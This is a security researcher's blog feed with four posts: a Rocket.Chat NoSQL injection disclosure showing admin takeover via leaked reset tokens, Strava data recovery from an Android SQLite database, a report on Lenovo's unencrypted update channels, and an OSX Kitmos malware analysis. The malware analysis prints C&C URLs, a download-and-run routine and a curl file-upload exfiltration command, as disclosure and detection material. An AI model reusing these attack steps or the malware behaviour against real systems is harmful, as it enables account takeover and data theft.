tag:blogger.com,1999:blog-65552080344416438952024-03-13T07:11:29.251+01:00Steeve Barbeau's blogA blog on computer security ...Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.comBlogger24125tag:blogger.com,1999:blog-6555208034441643895.post-38140497162100748992018-03-05T09:00:00.000+01:002018-03-05T15:44:21.354+01:00NoSQL injection leading to administrator account takeover in Rocket.Chat (0.57.3, 0.58.3 and below)<h3>
Executive Summary</h3>
A regular user account can access sensitive data using a NoSQL injection vulnerability in the API provided by Rocket.Chat. Data includes usernames, email addresses, login tokens, password hashes and reset tokens of all users of the application including administrators. A malicious user can try to crack the password hashes or request a password reset to compromise accounts. Using that vulnerability, a regular user can get an administrator access on the application which can results in other sensitive data exposure such as conversations, LDAP configuration…<br />
<br />
<h3>
What is Rocket.Chat?</h3>
According to their website, "Rocket.Chat is the leading open source team chat software solution. Free, unlimited and completely customizable with on-premises and SaaS cloud hosting." Based on a <a href="https://twitter.com/RocketChat/status/928028081436184576">tweet</a> from last November, Rocket.Chat has been installed on over 150k servers and is used by more than 10 million people.<br />
<br />
<h3>
Detailed explanations</h3>
This vulnerability has been tested on Rocket.Chat 0.58.3, last stable release as of October 4th 2017. According to the source code on GitHub, the current development code is also vulnerable.<br />
<br />
Two attacks scenario exploiting this NoSQL injection have been identified:<br />
<br />
<ul>
<li>Password hashes extraction</li>
<li>Account takeover via password reset</li>
</ul>
<br />
<h3>
Password hashes extraction</h3>
Request to the API to show the version:<br />
<img alt="2017-10-04-131626_900x318_scrot.png" height="220" src="https://lh3.googleusercontent.com/tkpm-wb-hmi8CEJ6HczWRl85zooCbz0aXxYT2K3vk7bhPdAgjb5cyOTbTxtWnqwA2bQsHLvAeNFsBhC5hE6DA1KbM1OGjvixtHalf3rG7KUi0IDSwc1P6As-g59RKfRY0f1fuEc3" style="border: none; font-family: arial; font-size: 14.6667px; transform: rotate(0rad); white-space: pre;" width="624" /><br />
<br />
Login to the API with a regular user:<br />
<img alt="2017-10-04-131959_1154x322_scrot.png" height="175" src="https://lh4.googleusercontent.com/qs5q6-BhL-K-G_PGBbjHz2FwJ1r-bGSK9Dr1xv1YYt8sk0XFa5gXC93B6QWCVlCYOJfrI4YoaxVyAXcL-KYtSy8G5Y9-KQUOD52hwLHZIDwNSCWed9J2WDXCY9LU-kwyN8S00zfx" style="border: none; font-family: arial; font-size: 14.6667px; transform: rotate(0rad); white-space: pre;" width="624" /><br />
<br />
Check user privileges:<br />
<img alt="2017-10-04-132141_1037x389_scrot.png" height="235" src="https://lh6.googleusercontent.com/6a1UQmiaMpcfNF3J64fXSoqCvSNZzzoCw4pEe8vYKDHb76xbRXb26Rc_l73ZySMaEaT-ij7MFNuEAeER6Iczsn6NtxE2twxHenK-gUyHGQu7pbJYxQXmjsY7048-vX49NIwctv0R" style="border: none; font-family: arial; font-size: 14.6667px; transform: rotate(0rad); white-space: pre;" width="624" /><br />
<br />
The regular user “attacker” is of type “user” and doesn’t have access to administration features.<br />
<br />
Our regular user is able to list administrators using the NoSQL injection in the “query” parameter:<br />
<img alt="2017-10-04-132255_1080x471_scrot.png" height="272" src="https://lh5.googleusercontent.com/PmOpiNWo_5oOdPwVlm5sYTMB7S3V3wQkMkUTemxRX4_2QLvVGR65CGBy5lY0EFahNKaOTY2zaGO2vDZLc2lwh1OqEpmaLqYa4dvSqlaM5jy16Kga0uD0OVieuWU9MWyU3d8Klf5O" style="border: none; font-family: arial; font-size: 11pt; transform: rotate(0rad); white-space: pre;" width="624" /><br />
<br />
It is also possible to show hidden fields with the “fields” parameter:<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img alt="2017-10-04-132454_1337x564_scrot.png" height="263" src="https://lh5.googleusercontent.com/TnfpRHuv9KMv-jWjGEAm7XvGV2f8rJxX04vxh6BaqgeNIiEobXiqcki3jLaH4KdiuoT8azdlOIwdrOixD68DGJSG_wemINJDqWat0-CXSaXCO2BwwxgbXGJnftdSyarvt9E75mnV" style="border: none; transform: rotate(0rad);" width="624" /></span><br />
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><br /></span>
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"></span><br />
With this information, a regular user has access to usernames, email addresses and password hashes of administrators. He can use tools such as JohnTheRipper or Hashcat to try to find cleartext passwords. Passwords are hashed using Meteor’s Accounts-password library like this:<br />
<i>hash = bcrypt(sha256(password))</i></div>
<br />
<h3>
Account takeover via password reset</h3>
There is an easier/faster way to compromise administrator accounts, it is by using the “Reset password” feature. Before asking for a password reset, our victim data account looks like this:<br />
<img alt="2017-10-04-133054_1064x514_scrot.png" height="301" src="https://lh5.googleusercontent.com/PjxZjngalSB6mwzEg8R4YEMj2n5u5m9YD6un-vWkup6AxnKuaypvEssnn72iq1oluIahwpBqDd0Tbrlr3IQSYWnQCQS_xb0o_K2xGH89BIbLtuB3kjT06rnm-Z1_cZUwVpHpx0jg" style="border: none; font-family: arial; font-size: 14.6667px; transform: rotate(0rad); white-space: pre;" width="624" /><br />
<br />
We can use his email address to request a password reset:<br />
<img alt="2017-10-04-133215_1357x589_scrot.png" height="271" src="https://lh4.googleusercontent.com/2QimFQKCS9ctQRErsfuovgZ3YObrwTmU_zIyBo7KSdlOlpMf20fCFgzipvBDNaimroSZtTyvKceocH-lqkmMttckBWNAnc71YcGv49menobR3_TxQ7urszqCd8bCQt24D0NjFrK3" style="border: none; font-family: arial; font-size: 14.6667px; transform: rotate(0rad); white-space: pre;" width="624" /><br />
<br />
After requesting a password reset, a malicious low privileged user (attacker) can request the API to get access to the password reset token:<br />
<img alt="2017-10-04-133249_1223x563_scrot.png" height="287" src="https://lh4.googleusercontent.com/i3TaylzfO7vv-pJY6Yn7ukcZnmZFdWFzYjiMbZDSHt0xuOIGhcE0jqpjugnsJfdzNm7fbHckwQBWmWriJCL__MZ33U7soywYgNQ4uEq3AEBNYbSmgbCGVNpqvtftaf0kPs0GkakP" style="border: none; font-family: arial; font-size: 14.6667px; transform: rotate(0rad); white-space: pre;" width="624" /><br />
<br />
With that reset token in hands, a malicious user can reset the victim’s password (admin):<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img alt="2017-10-04-133401_1359x604_scrot.png" height="277" src="https://lh6.googleusercontent.com/SXT5di3Oaw1T6Evab1c4GAxJQAJzahtD4_YKQ4nOfXzpHR4A4zpG0KZb5j-SXklqYU36AZBetC0hsyN-wPIFOO1apN_SFZwVwqaigIOOJML7RNb0b2dnmv3UYKiO80wev7KkGjTy" style="border: none; transform: rotate(0rad);" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img alt="2017-10-04-133451_1341x701_scrot.png" height="327" src="https://lh5.googleusercontent.com/E4Hxd2h-eQGhBzK-9yg3b6azqDZGkVOoMeyOy1sjLOGjObnTEyKJeD3s4SqHFQurWRV2seXn4zIByPQwC5s5ApX6Ph_WlH6NPUjRi77Ge4iGVi4twJh0vB-APefP7hnj8BdEiKOl" style="border: none; transform: rotate(0rad);" width="624" /></span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<br />
<div dir="ltr" style="-webkit-text-stroke-width: 0px; color: black; font-family: "Times New Roman"; font-size: medium; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<div style="margin: 0px;">
<br /></div>
</div>
<h3>
Timeline</h3>
<br />
October 4th 2017: Bug reported<br />
October 5th 2017: <a href="https://github.com/RocketChat/Rocket.Chat/pull/8408">Fix</a> deployed<br />
January 2nd 2018: Attribution of CVE ID <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000493">CVE-2017-1000493</a><br />
January 17th 2018: Official communication from Rocket.Chat about the vulnerability (<a href="https://rocket.chat/2018/01/17/security-vulnerability-disclosure/">Blog post</a> <a href="https://twitter.com/RocketChat/status/954032474912370690">Tweet</a> <a href="https://twitter.com/RocketChat/status/963466593757024256">Tweet</a>)<br />
March 5th 2018: Publication of this blog post<br />
<br />
<br />
Thanks to the Rocket.Chat team that has been fast fixing the reported vulnerability<br />
<br />
<br />
After a quick search on Shodan, I figure it out that there is another easy way to compromise a Rocket.Chat application ...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivABDV0lbohG4Rbc1mlCLtCCRokthcUF0X60vLOzONS7kMlPI_au43I0UW8iqZOHMKm7X5j93rHRpukEdD6OOGLRUV-E65RoXtTYgFEzZ8qSQb2KBzPMhMcJ5SrR8YcbWaDLzC6YBgg2OF/s1600/2018-03-01-212237_1366x768_scrot.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="633" data-original-width="1057" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivABDV0lbohG4Rbc1mlCLtCCRokthcUF0X60vLOzONS7kMlPI_au43I0UW8iqZOHMKm7X5j93rHRpukEdD6OOGLRUV-E65RoXtTYgFEzZ8qSQb2KBzPMhMcJ5SrR8YcbWaDLzC6YBgg2OF/s640/2018-03-01-212237_1366x768_scrot.png" width="640" /></a></div>
<br /><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-4744252527167250522016-07-26T16:26:00.003+02:002016-07-26T16:26:37.513+02:00How I save my Strava activityLast Sunday, when I reached my home after my bike ride I took my smartphone from my pocket to stop the activity and tried to put it back in it. But I missed the pocket and the phone fall (screen first) on the sidewalk. I was able to turn on/off the screen but the touch sensor was not responding so the phone was unusable.<br />
Breaking a phone is always something annoying but when it contains your longest bike ride statistics not yet synchronized, it's worst.<br />
<br />
<div style="text-align: center;">
<img src="http://www.fuelrunning.com/repository/running-humor/0154.jpg" /></div>
<br />
I then spend some time to think about how I could access to the detail of my activity. I was only able to see the distance and duration on the lock screen, but that was not enough for me.<br />
<br />
<br />
<h2>
The easiest solution</h2>
While I was <strike>complaining</strike> talking about my broken screen and unsynchronized Strava activity on IRC, a friend (Edouard), suggests me to install a remote control software to access the phone screen via the computer. That idea was great and worked well.<br />
<br />
For that I connected my phone via USB to my computer and used <a href="http://www.vysor.io/">Vysor Chrome extension</a> and adb. That's probably doable with any similar tools, but they can require to install an app on the device.<br />
<br />
If the device is not Internet connected (like my phone that I used only to record bike rides), it may be necessary to enable WiFi with "svc wifi enable" command in adb shell.<br />
If the phone is locked, it can be necessary to unlock it via adb: "input keyevent 66 && input text XXX && input keyevent 66" (XXX is the password, 66 is the key code for Enter).<br />
<br />
<br />
<h2>
The geek solution</h2>
When I thought about that issue, my first idea was to analyze files used by Strava on Android and my last option was dumping the memory to try to find some data related to my activity.<br />
<br />
First thing first, I started looking for files on the file system of my phone where I can find data related to my Strava activity.<br />
<br />
<i>root@mako:/ # find . 2> /dev/null -name *strava*</i><br />
<br />
A search like the previous one was able to list many files:<br />
<br />
<i>./storage/emulated/0/Android/data/com.strava</i><br />
<i>./storage/emulated/0/Android/data/com.strava/cache/cache_vts_labl_com.strava.m</i><br />
<i>./storage/emulated/0/Android/data/com.strava/cache/cache_vts_com.strava.m</i><br />
<i>./storage/emulated/0/Android/data/com.strava/cache/cache_vts_inaka_com.strava.m</i><br />
<i>./storage/emulated/0/Android/data/com.strava/cache/cache_vts_com.strava.0</i><br />
<i>./storage/emulated/0/Android/data/com.strava/cache/cache_vts_inaka_com.strava.0</i><br />
<i>./storage/emulated/0/.estrongs/.app_icon_back/ver/com.strava_419</i><br />
<i>./storage/emulated/0/.estrongs/.app_icon_back/ver/com.strava_512</i><br />
<i>./storage/emulated/0/.estrongs/.app_icon_back/ver/com.strava_516</i><br />
<i>./storage/emulated/0/.estrongs/.app_icon_back/com.strava.png</i><br />
<div>
<i>[...]</i></div>
<div>
<div>
<i>./data/data/com.strava/shared_prefs/com.strava.preference.excludeFromBackup.xml</i></div>
<div>
<i>./data/data/com.strava/shared_prefs/com.strava.preference.userPreferences.xml</i></div>
<div>
<i>./data/data/com.strava/shared_prefs/com.strava_preferences.xml</i></div>
<div>
<i>./data/data/com.strava/shared_prefs/apptimizecom.strava.xml</i></div>
<div>
<i>./data/data/com.strava/files/DATA_disk_creation_time_vts_labl_com.strava</i></div>
<div>
<i>./data/data/com.strava/files/DATA_disk_creation_time_vts_com.strava</i></div>
<div>
<i>./data/data/com.strava/files/DATA_disk_creation_time_vts_inaka_com.strava</i></div>
<div>
<i>./data/data/com.strava/files/event_store_v2_com.strava</i></div>
<div>
<i>./data/data/com.strava/files/DATA_ServerControlledParametersManager.data.com.strava</i></div>
<div>
<i>./data/data/com.strava/databases/strava</i></div>
<div>
<i>./data/data/com.strava/databases/strava-journal</i></div>
<div>
<i>./data/app/com.strava-1</i></div>
<div>
<i>./data/dalvik-cache/profiles/com.strava</i></div>
<div>
<i>./data/media/0/Android/data/com.strava</i></div>
</div>
<br />
I started to analyze the cache directory. Each activity recorded by Strava created few files in that cache directory. Here is how the content looks like for 3 activities:<br />
<br />
<i>root@mako:/storage/self/primary/Android/data/com.strava/cache # ls -l</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 76181 2016-07-21 20:02 cache_bd.0</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 17540 2016-07-24 08:33 cache_bd.1</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 49152 2016-07-24 08:33 cache_bd.m</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 22528 2016-07-19 19:49 cache_its.m</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 22528 2016-07-19 19:49 cache_its_ter.m</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 23257 2016-07-21 20:24 cache_r.0</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 32768 2016-07-21 20:24 cache_r.m</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 4061958 2016-07-24 08:33 cache_vts_com.strava.0</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 40960 2016-07-24 08:33 cache_vts_com.strava.m</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 2827 2016-07-21 20:02 cache_vts_inaka_com.strava.0</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 40960 2016-07-21 20:02 cache_vts_inaka_com.strava.m</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 27648 2016-07-19 19:49 cache_vts_labl_com.strava.m</i><br />
<i>drwxrwx--x u0_a111 sdcard_rw 2016-07-19 16:53 debug</i><br />
<div>
<br /></div>
These files contain probably some interesting data, but nothing understandable without in-depth analysis of the app.<br />
<br />
The find command also return a SQLite database (<i>./data/data/com.strava/databases/strava</i>) which is easier to understand and contain a lot of information.<br />
<br />
<h3>
Database description</h3>
This is a listing of the tables present in this SQLite database with a short description of their content when I was able to understand it. I didn't try to analyze everything as I mainly focus of the unsynchronized activity.<br />
<br />
- activities: Information of your user's friends activities<br />
- activities_unsynced: Unsynchronized activities<br />
- android_metadata: Only store the language<br />
- annual_progress_goals: Annual total distance for running biking and swimming of user's friends<br />
- athlete_clubs<br />
- athlete_contact<br />
- athlete_stats: Number of activities, distance, duration and elevation gain for running, biking and swimming for recent activities, for the year and since the user uses the app for him and all his friends. NB: the numbers can be not accurate (doesn't seem to be updated frequently)<br />
- athletes: Details about the athlete profiles visited included the profile of the user (with more details than the other athletes)<br />
- challenge_leaderboards: Summary of the leaderboards for each challenge subscribed by the user<br />
- challenge_participants: Information about which user's friend is participating to which challenge<br />
- challenges: Information about the challenges available<br />
- clubs<br />
- comments<br />
- dorado_impression: A unique URL to a 1x1 gif used to track something (probably Premium ads printing)<br />
- facebook_search: Information about the user's friends found via Facebook<br />
- feed_entries: Information about activities shown in the app (via clubs, challenges for exemple)<br />
- followers: Information about athletes following the user<br />
- followings: Information about the athletes followed by athletes in the 'athletes' table<br />
- froutes<br />
- gear: List of gear (shoes, bikes) and distance traveled with<br />
- kudos<br />
- live_activities<br />
- live_activities_points<br />
- live_athletes<br />
- live_events<br />
- live_location_activities_gson<br />
- live_matches<br />
- live_tracking_contacts<br />
- notification_settings<br />
- notifications: Information about app notifications<br />
- progress_goals: Progress goals about athletes from 'athletes' table<br />
- promo_overlay<br />
- related_activites<br />
- routes: Route information when they have been printed on screen (for any kind of user)<br />
- rts_logs: Geolocalisation data for unsynchronized activities<br />
- segments: Information about activities segments<br />
- sensor_datum: Information ('relative_altitude', 'pause_type') for unsynchronized activities<br />
- streams <br />
- training_videos<br />
- unsynced_photos<br />
- waypoints: Details (latitude, longitude, altitude, speed, elapsed time, speed) for unsynchronized activities<br />
- zones<br />
<div>
<br /></div>
<div>
<br /></div>
<h3>
Let's get my data back</h3>
<br />
The previous tables listing shows some interesting tables, like "activities_unsynced" which contains some meta data about all unsynchronized activities:<br />
<br />
<i>sqlite> select * from activities_unsynced;</i><br />
<i>id|updated_at|json</i><br />
<i>3|1469393124028|{"activity_id":0,"auto_pause_enabled":false,"commute":false,"distance":84499.02644972557,"elapsed_time":0,"end_timestamp":0,"guid":"REDACTED","is_private":false,"live_activity_id":0,"row_id":3,"m_end_battery_level":-1.0,"m_initial_elevation":94.42694,"m_screen_on":false,"m_screen_on_start":53574812,"m_screen_on_time":723567,"m_screen_timer_invalid":false,"m_start_battery_level":0.99,"sync_state":"UNFINISHED","manual":false,"name":"2016-07-24","photos":[],"route_id":-1,"sensor_averages":{"1":{"a":10000,"b":0,"c":0.0,"e":true},"0":{"a":10000,"b":0,"c":0.0,"e":true},"10":{"a":10000,"b":0,"c":0.0,"e":true},"18":{"a":10000,"b":0,"c":0.0,"e":true}},"should_facebook_share":false,"start_timestamp":1469374573560,"type":"Ride","video_view_id":-1,"workout_type":-1}</i><br />
<div>
<br /></div>
Interesting data include:<br />
- distance<br />
- elapsed time<br />
- start timestamp<br />
- end timestamp<br />
- guid (unique ID of the activity)<br />
- name<br />
- type<br />
- synchronization state<br />
<br />
NB: The dot in the timestamp is missing (1469374573560 -> 1469374573.560) and the distance is recorded in meters (even if the application is configured to use miles).<br />
<br />
<br />
An other interesting table is "rts_logs" as it contains few GPS coordinates of the user during its activity:<br />
<br />
<i>sqlite> select * from "rts_logs";</i><br />
<i>id|updated_at|activity_guid|json</i><br />
<i>76|-1|REDACTED|{"m_activity_guid":"REDACTED","m_log_json":"{\"latlng\":[37.74XXXXXX,-122.43XXXXXX],\"timestamp\":1469374596336,\"failure_code\":1001,\"failure_status_code\":-1}","m_type":"request"}</i><br />
<i>[...]</i><br />
<i>sqlite> select count(id) from rts_logs;</i><br />
<i>count(id)</i><br />
<i>67</i><br />
<div>
<br /></div>
<div>
This table can be used to track the user using latitude, longitude and timestamp but 67 records for a 84km/52miles ride, it's not that much.</div>
<div>
<br /></div>
<div>
Hopefully another table contains more detailed information about the activity, and that table is "waypoints":</div>
<div>
<br /></div>
<div>
<div>
<i>sqlite> select * from waypoints;</i></div>
<div>
<i>ride_id|pos|timestamp|latiude|longitude|altitude|h_accuracy|v_accuracy|command|speed|bearing|device_time|filtered|elapsed_time|distance</i></div>
<div>
<i>REDACTED|0|1469374597000|37.74XXXXXX|-122.43XXXXXX|18.60XXXXXXXXXXX|9.0|||7.0|86.3000030517578|1469374596293|0|10241|0.0</i></div>
<div>
<i>[...]</i></div>
<div>
<i>REDACTED|17356|1469393123000|37.74XXXXXX|-122.43XXXXXX|34.X|3.0|||0.0|0.0|1469393123969|1|15800446|84499.0264497256</i></div>
</div>
<div>
<div>
<i>sqlite> select count() from waypoints;</i></div>
<div>
<i>count()</i></div>
<div>
<i>17357</i></div>
</div>
<div>
<br /></div>
<div>
We now have 17357 GPS coordinates to recreate the activity map (using OpenStreetMap or Google Maps) and do some statistics!</div>
<div>
<br /></div>
<div>
I hope that this understanding of the Strava SQLite database can be useful for any person in a similar situation as me (broken phone with unsynchronized activity) or for forensics analysis (lot of GPS data in it)!</div>
<div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0San Francisco, CA, USA37.7749295 -122.4194155000000137.373501499999996 -123.06486250000002 38.1763575 -121.77396850000001tag:blogger.com,1999:blog-6555208034441643895.post-84031786989876569882015-04-07T22:02:00.000+02:002015-04-07T22:05:29.159+02:00Security update issue on Lenovo tabletFew days ago, I spend some of my free time checking what my chinese android tablet (Lenovo Yoga 2) was sending on the Internet. I quickly identify some interesting HTTP requests.<br />
<br />
As most of the manufacturers, Lenovo ships their tablets with additional software developped by Lenovo or others.<br />
The GameStore app is one of them. That application is checking if updates are available on HTTP and if it find one, downloads it on HTTP too:<br />
<div>
<br /></div>
<script src="https://gist.github.com/steeve85/89874b7ae3e9c706739e.js"></script>
<br />
<div>
The APK file is also available on HTTPS but not used!</div>
<div>
<br /></div>
<div>
The GameStore app can be used to buy new (unknown) games, and seems to be vulnerable to price tampering (not fully tested because stealing is as bad as games on this store). After an update, they remove the payment method which was previously easily vulnerable.</div>
<div>
<br /></div>
<div>
Some Lenovo apps seem to have a similar behavior. They check for updates over HTTP, but I have not been able to trigger any update download :/ </div>
<div>
Update requests looks like that:</div>
<div>
<br /></div>
<div>
<script src="https://gist.github.com/steeve85/e226f79b8c58551f5ec6.js"></script>
</div>
<div>
<br /></div>
<div>
Hey Lenovo, why do you need to know my (private) IP address ?</div>
<div>
<br /></div>
<div>
Other update requests are sent to http://susapi.lenovomm.com/adpserver/GetVIByPNUser with different parameters.</div>
<div>
<br /></div>
<div>
The most interesting HTTP requests I saw was those relating to firmware update! </div>
<div>
The query update looks like that (as my tablet was already up-to-date, I changed my firmware version in the request):<br />
<br />
<script src="https://gist.github.com/steeve85/cfee5ac0d315327845d5.js"></script>
And the answer is:<br />
<br />
<script src="https://gist.github.com/steeve85/ccf267f547b0416ba61a.js"></script>
</div>
<div>
So Lenovo applications and firmware update on HTTP. Come on guys, we are in 2015!<br />
<br />
NB: Tests have been done on YT2-830F_USR_S000143_1501051826_WW21_ROW firmware. Few days after I notice Lenovo Security team, they publish a new firmware (YT2-830F_USR_S000184_1503241129_WW21_ROW) which do not fix that issue... </div>
<div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-7935826855948014962013-05-24T00:57:00.000+02:002013-05-24T00:57:29.645+02:00OSX Kitmos : other binary, other C&C<br />
On May the 20th, Norman has published a <a class="vt-p" href="http://blogs.norman.com/2013/security-research/the-hangover-report">report</a> about an Indian cyberattack infrastructure that they call "Hangover" due to information found to the path to a PDB file.<br />
Their blog <a class="vt-p" href="http://blogs.norman.com/2013/security-research/the-hangover-report">post</a> also refers to Oslo Freedom Forum attack that I wrote about in my previous <a class="vt-p" href="http://blog.sbarbeau.fr/2013/05/osx-kitmos-analysis.html">article</a> :<br />
"<i>Based on the sample and Command&Control domain mentioned in the F-Secure post, we can say quite conclusively that the Oslo Freedom Forum attack was performed through the same attack infrastructure. We also found another MachO executable apparently written by the same person (same Apple Developer ID), and using another domain in the Hangover infrastructure – torqspot.org.</i>"<br />
<br />
As this domain was present in another Mach-O binary that I have, I have chose to take a quick look at it.<br />
<br />
<br />
<br />
<h2>
File informations</h2>
SHA1 hash : b6a47d52de64af50a5a1415213e60dc1b076b4e7<br />
File type : Mach-O executable i386<br />
VirusTotal report : https://www.virustotal.com/en/file/a74196018b2854765333a8f798b0ae3f3b71c89ec9632188f07c71d055125cb2/analysis/<br />
<br />
<h2>
C&C information</h2>
This sample uses "torqspot.org" as C&C domain name. Whois reveals still fake information :<br />
<br />
Domain ID:D168171472-LROR<br />
Domain Name:TORQSPOT.ORG<br />
Created On:16-Mar-2013 05:28:07 UTC<br />
Last Updated On:16-May-2013 03:45:16 UTC<br />
Expiration Date:16-Mar-2014 05:28:07 UTC<br />
Sponsoring Registrar:PDR Ltd. d/b/a PublicDomainRegistry.com (R27-LROR)<br />
Status:CLIENT TRANSFER PROHIBITED<br />
Registrant ID:DI_25590875<br />
Registrant Name:Melissa Leo<br />
Registrant Street1:E-5 cecill street<br />
Registrant Street2:Manchester<br />
Registrant City:Manchester<br />
Registrant State/Province:Manchester(Cityof)<br />
Registrant Postal Code:M14LF<br />
Registrant Country:GB<br />
Registrant Phone:+044.7251868<br />
Registrant Email:leo.melissa@mail.ru<br />
<br />
C&C is not responding anymore.<br />
<h2>
</h2>
<h2>
IOC</h2>
All logged messages can be used to identify a compromised macintosh. For example, the following messages can be used as IOC :<br />
<br />
- "http://torqspot.org/App/MacADV/up.php?cname=%@&file=%@"<br />
- "CONTACTS mreslt %@"<br />
- "CONTACTS urlResponse %d"<br />
- "responseData: %@"<br />
- "http://torqspot.org/App/MacADV/$hostname/$serverResponse"<br />
- "/Applications"<br />
- "End"<br />
- "app path =%@"<br />
- " exec path =%@"<br />
- "file: %@"<br />
- "connected to upload server %@"<br />
- "Fail connected to upload server %@, begin in %d sec"<br />
- "Try zip and upload for failed file, before."<br />
- "ComputerName_UserName : %@"<br />
- "Failed retry %@"<br />
- "Retry %@"<br />
- "New seesion"<br />
- "search path from state.dat"<br />
- "search path from root"<br />
- "available paths: %@"<br />
- "No found folder"<br />
- "No found file"<br />
- "Start searching"<br />
- "%ld files found"<br />
<br />
DNS resolution to "torqspot.org" and all kind of HTTP requests to this domain can also be used to identify a compromised computer on a network.<br />
<h2>
</h2>
<h2>
Features</h2>
Lots of features and functions (coml, cop, runSystemCommand, ...) are similar to previous <a class="vt-p" href="http://blog.sbarbeau.fr/2013/05/osx-kitmos-analysis.html">binary analyzed</a>. Below, only new and interesting will be detailed.<br />
<br />
<h3>
macurl</h3>
- send synchronous HTTP request to "http://torqspot.org/App/MacADV/up.php?cname=%@&file=%@" w/ hostname as 1st arg and "no" as 2nd arg<br />
- get data at URL "http://torqspot.org/App/MacADV/$hostname/$serverResponse" w/ dataWithContentsOfURL function, where $serverResponse is the response sent by the server to the previous request<br />
- write downloaded data to file "/Applications/$ServerResponse"<br />
- execute following command :<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>"/usr/bin/<a class="vt-p" href="http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man1/ditto.1.html">ditto</a> -x -k /Applications/$ServerResponse /Applications/" to extract PKZip archive "/Applications/$ServerResponse" to "/Applications/"<br />
- replace/add ".app" extension to "/Applications/$ServerResponse"<br />
- if path exists, run the executable (NSTask, setLaunchPath, launch)<br />
- create string "http://torqspot.org/App/MacDV/up.php?cname=%@&file=%@&res=%@" w/ arguments : $hostname, $serverResponse and "sucess" (w/ one 'c' :)<br />
- send a request using that string (w/ sendSynchronousRequest:returningResponse:error: method)<br />
- log "file: %@" w/ data answered by the server as argument<br />
<br />
<h3>
initFileBackup</h3>
- get bundlePath and add "FileBackup.ini" to it<br />
- use "stringWithContentsOfFile:encoding:error:" function to get content data of config file ("<bundlePath>/FileBackup.ini")<br />
- if file content iss less than 10 characters, go to the end of the function<br />
- extract data between <URL> and </URL> to pass as parameter to setUrl function<br />
- extract data between <EXTENSION> and <EXTENSION> and use it to create an array of strings based on ';' separator<br />
- call setExtArray to initialize an array with extensions stored in "FileBackup.ini" file<br />
<br />
<h3>
before_start_</h3>
- get bundlePath and add "state.dat" to it<br />
- if that file exists, read its content and create an array of strings by spliting on "#####" separator. Then use strings in that array as paths<br />
- if the file doesn't exist, path will be set to "/"<br />
- call connectServer/upload of ZipUpload class and run a command similar to this : "/usr/bin/curl -F upload=@ -F pc="<br />
<br />
<h3>
find_</h3>
Looking for files based on extension<br />
<br />
<h3>
batch_</h3>
Do some stuff and call macurl<br />
<br />
<h3>
deleteState_</h3>
Delete file "<bundlePath>/state.dat" if it exists<br />
<br />
<h3>
saveState_</h3>
Save a string array to "<bundlePath>/state.dat" by separating strings by "#####". This function is called by find function and the malware terminates.<br />
<br />
<br />
<h2>
Refs</h2>
<a class="vt-p" href="https://github.com/gdbinit/fixobjc/blob/master/fixobjc.idc">https://github.com/gdbinit/fixobjc/blob/master/fixobjc.idc</a><br />
<a class="vt-p" href="http://www.f-secure.com/weblog/archives/00002554.html">http://www.f-secure.com/weblog/archives/00002554.html</a><br />
<a class="vt-p" href="http://threatpost.com/new-mac-malware-discovered-on-attendee-computer-at-anti-surveillance-workshop/">http://threatpost.com/new-mac-malware-discovered-on-attendee-computer-at-anti-surveillance-workshop/</a><br />
<a class="vt-p" href="http://blogs.norman.com/2013/security-research/the-hangover-report">http://blogs.norman.com/2013/security-research/the-hangover-report</a><br />
